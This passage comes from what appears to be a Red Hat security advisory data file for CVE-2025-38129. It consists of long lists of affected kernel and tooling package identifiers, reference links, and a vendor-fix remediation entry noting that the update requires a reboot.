"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38129"
},
{
"category": "external",
"summary": "RHBZ#2376034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376034"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38129",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38129"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070330-CVE-2025-38129-3c0e@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070330-CVE-2025-38129-3c0e@gregkh/T"
}
],
"release_date": "2025-07-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-11T01:14:40+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
